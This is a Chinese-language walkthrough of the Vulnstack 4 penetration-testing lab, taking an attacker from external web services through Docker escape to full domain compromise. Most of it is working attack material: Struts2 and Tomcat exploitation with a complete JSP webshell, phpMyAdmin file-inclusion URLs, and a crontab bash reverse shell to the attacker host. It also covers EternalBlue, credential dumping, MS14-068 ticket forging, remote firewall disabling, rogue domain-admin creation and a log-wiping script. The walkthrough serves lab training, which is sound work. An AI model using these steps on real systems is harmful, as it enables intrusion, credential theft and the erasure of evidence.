Vulnstack内网靶场4

环境

仅主机模式内网网段192.168.183.0/24

外网网段192.168.157.0/24

其中Ubuntu作为对外的内网机器

攻击机kali地址：192.168.157.129 悬剑：192.168.157.130

还需要进入ubuntu开启服务，密码ubuntu

cd /home/ubuntu/Desktop/vulhub/struts2/s2-045v
sudo docker-compose up -d

cd /home/ubuntu/Desktop/vulhub/tomcat/CVE-2017-12615
sudo docker-compose up -d

cd /home/ubuntu/Desktop/vulhub/phpmyadmin/CVE-2018-12613
sudo docker-compose up -d

信息收集

nmap -sS 192.168.157.0/24
nmap -sV -A 192.168.157.128

可以看到2001、2002、2003分别对应jetty、tomcat、apache中间件

从2001端口开始吧

Ubuntu Getshell

2001Struts2

web界面是这样的，标题提示了是struts2的框架

尝试了一下上传一句话木马，上传成功了但是无路径回显无法利用

直接上struts2扫描工具

看到存在漏洞S2-045、S2-046，查了一下是命令执行漏洞，验证一下

接着使用wget上传木马getshell

kali开启apache服务

service apache2 start

制作msf木马，放在var/www/html下

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.157.129 LPORT=4444 -f elf > shell.elf

远程执行命令

wget http://192.168.157.129/shell.elf

可以看到木马已经上传上去

接着chmod +x shell.elf添加一个执行权限然后./shell.elf运行就行了

2002tomcat

Tomcat 8.5.19版本，查询了一下，存在CVE-2017-12615任意写入文件漏洞，漏洞本质是Tomcat配置文件/conf/web.xml 配置了可写（readonly=false），导致我们可以往服务器写文件。

抓个包，修改一下数据包改成put，写入木马（因为是tomcat，所以用jsp后门）

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

蚁剑连接

同样可以反弹msf shell就不演示了

2003phpMyAdmin

连密码都不用就直接进去了，那就查看一下版本号看看存在什么漏洞

4.8.1远程文件包含漏洞（CVE-2018-12613）

验证一下是否存在，接下来就写入一句话然后文件包含连接

http://192.168.157.128:2003/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

但是试了一下就算知道了绝对路径也无法文件包含数据库内的一句话，进去ubuntu看了一下也根本没有这个路径，十分奇怪

后来看到网上的poc，还可以使用session包含，测试一下

http://192.168.157.128:2003/index.php?target=db_datadict.php%253f/../../../../../../../../../tmp/sess_a87f3b504810883a0db7aa69946f1988

这个原理就是包含缓存文件，接着就写入一句话

但写了一句话之后，蚁剑也连接不上，看了一下缓存文件的信息，发现一句话被序列化储存了，没办法利用

绝对路径也没法使用，这里只能放弃这个方法getshell了

docker逃逸

拿到shell之后首先要做的就是看看是否存在内网，扫描一下是否存在其他网段

但是明明是root用户ifconfig的命令却用不了，加上之前phpmyadmin的路径问题，让我怀疑我是不是在虚拟机的容器里

果然还是没有这么简单，现在要离开这个容器，由于之前没有接触过容器，急忙恶补了容器的知识初识Docker逃逸 - FreeBuf网络安全行业门户

这里我尝试采用了目录挂载逃逸

查看磁盘文件：

fdisk -l

从返回结果来看sda1、sda2、sda5在/dev目录下。

新建一个目录/test，然后将/dev/sda1挂载到新建的目录下

mkdir /test
mount /dev/sda1 /test

可以看到现在可以通过访问docker容器内部挂载整个宿主机本地文件的/test，来实现访问整个宿主机的目的。

在计划任务里写入一个bash反弹shell的脚本：

echo "/bin/bash -i >& bash -i >& /dev/tcp/192.168.157.129/9999 0>&1"  >> /test/tmp/shell.sh
chmod +x /test/tmp/shell.sh
cat /test/tmp/shell.sh

写入crontab计划任务，表示每隔两分钟以root权限执行一次计划

echo '*/2 * * * * root  bash /tmp/shell.sh' > /test/etc/crontab

cat /test/etc/crontab查看是否写入成功

kali nc监听

nc -lvp 9999

成功！

内网穿越

反弹个shell给msf

run get_local_subnets
run autoroute -s 192.168.183.0/24
run autoroute -p

添加内网路由

use auxiliary/server/socks_proxy

设置一下代理

打开proxychains4配置端口

vi /etc/proxychains4.conf

现在可以通过proxychains4实现内网访问

内网信息收集

use auxiliary/scanner/smb/smb_version
set rhosts 192.168.183.0/24
set threads 100

192.168.183.129 windows7

192.168.183.130 windows 2008

属于DEMO域

与此同时nmap的扫描也扫出来这两个ip

proxychains nmap -Pn -sT 192.168.183.0/24

端口扫描一些看看具体开放了哪些端口

use auxiliary/scanner/portscan/tcp
set rhosts 192.168.183.129-130

大概开放了这些，引人注目的就是445端口了，直接扫一下永恒之蓝

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.183.129-130

显示两个都易受到永恒之蓝攻击

payload要设置为正向

use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.183.129
set payload windows/x64/meterpreter/bind_tcp

win7直接拿下，但是win2008被打的蓝屏重启，不能用

继续信息收集一下，看看有没有别的遗漏

乱码问题输入chcp 65001

ipconfig
net view /domain
net time /domain
net user /domain
net group /domain
net group "domain computers" /domain
net group "domain controllers" /domain
net group "domain admins" /domain
net group "Enterprise Admins" /domain

但是无法进一步收集域内的信息了

load kiwi看看能不能抓取到密码

load kiwi
creds_all

一个域内用户douser和密码

只能通过远程桌面连接看看能不能收集到什么信息了

添加一个管理员用户，准备远程桌面

net user lry Admin111 /add
net localgroup administrators lry /add

开启3389端口

run post/windows/manage/enable_rdp

通过代理连接远程桌面

proxychains rdesktop 192.168.183.129

试了一下域内的用户登陆不上去

用了刚刚建立的管理员账户登陆上去也无济于事，后来突然意识到msf有个令牌窃取的功能Metasploit用法详解 - 1_Ry - 博客园 (cnblogs.com)

load incognito
list_tokens -u
impersonate_token DEMO\\douser   \\注意要加两个斜杠

现在就可以进行域内的信息收集了

Domain controllers:
WIN-ENS2VR5TR3N

域名:demo.com

域管账户:Administrator

横向移动

现在获取了win7的权限，但是2008的密码抓不到，win7也没有权限访问，查找了一下之前的笔记，不需要用到管理员权限的横向只能试试MS14-068了内网安全：域内横向移动 - 1_Ry - 博客园 (cnblogs.com)

查看SID

whoami /user

S-1-5-21-979886063-1111900045-1414766810-1107

域内用户douser和密码Dotest123

本来想上传上去，但发现里面有ms14-068和mimikatz.exe

使用ms14-068.exe生成票据

ms14-068.exe -u douser@demo.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130 -p Dotest123

清除票据

klist purge  \\清除
klist        \\查看

使用mimikatz导入票据

mimikatz.exe "kerberos::ptc C:\Users\douser\Desktop\TGT_douser@demo.com.ccache"

成功，这里dir不能用ip只能用主机名

连接成功后先用sc创建任务把防火墙远程关掉

sc \\WIN-ENS2VR5TR3N create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\WIN-ENS2VR5TR3N start unablefirewall

接下来上传一个msf正向木马到win7再到域控

msfvenom -p windows/x64/meterpreter/bind_tcp -f exe > shell.exe

创建计划任务的时候显示权限不足，那就继续用sc创建任务　　

schtasks /create /s 192.168.183.130 /tn test /sc onstart /tr c:\calc.bat /ru system /f

sc \\WIN-ENS2VR5TR3N create Startup binpath= "C:\shell.exe"
sc \\WIN-ENS2VR5TR3N start Startup

正向监听getshell

权限维持

获取的shell很不稳定，快速收集信息进行权限维持

kiwi获取密码

或者

添加一个域管理员用户

net user lry Admin111 /add
net group "domain admins" lry /add

开启3389端口

run post/windows/manage/enable_rdp

使用lry管理员登陆了上去

proxychains rdesktop 192.168.183.130

上传一个mimikatz到域控

privilege::debug
lsadump::lsa /patch

获取到域的SID和krbtgt的NTML后就可以制作黄金票据了

黄金票据、白银票据 - 1_Ry - 博客园 (cnblogs.com)具体就不制作了，现在只要域管理员不改krbtgt密码，我们就可以以域内普通用户的身份访问域控

痕迹清理

Linux

清除命令历史记录

histroy -r #删除当前会话历史记录

history -c #删除内存中的所有命令历史

rm .bash_history #删除历史文件中的内容

HISTZISE=0 #通过设置历史命令条数来清除所有历史记录

在隐蔽的位置执行命令

使用vim打开文件执行命令

:set history=0

:!command

linux日志文件

/var/run/utmp 记录现在登入的用户

/var/log/wtmp 记录用户所有的登入和登出

/var/log/lastlog 记录每一个用户最后登入时间

/var/log/btmp 记录错误的登入尝试

/var/log/auth.log 需要身份确认的操作

/var/log/secure 记录安全相关的日志信息

/var/log/maillog 记录邮件相关的日志信息

/var/log/message 记录系统启动后的信息和错误日志

/var/log/cron 记录定时任务相关的日志信息

/var/log/spooler 记录UUCP和news设备相关的日志信息

/var/log/boot.log 记录守护进程启动和停止相关的日志消息

完全删除日志文件：

cat /dev/null > filename

: > filename

> filename

echo "" > filename

echo > filename

针对性删除日志文件：

删除当天日志

sed -i '/当天日期/'d filename

一键清除脚本：

#!/usr/bin/bash

echo > /var/log/syslog

echo > /var/log/messages

echo > /var/log/httpd/access_log

echo > /var/log/httpd/error_log

echo > /var/log/xferlog

echo > /var/log/secure

echo > /var/log/auth.log

echo > /var/log/user.log

echo > /var/log/wtmp

echo > /var/log/lastlog

echo > /var/log/btmp

echo > /var/run/utmp

rm ~/./bash_history

history -c

windows

msf

1.查看事件日志

run event_manager -i

2.删除事件日志

run event_manager -c

3.clearv命令清除目标系统的事件日志。

4、还需要手动删除刚刚上传的后门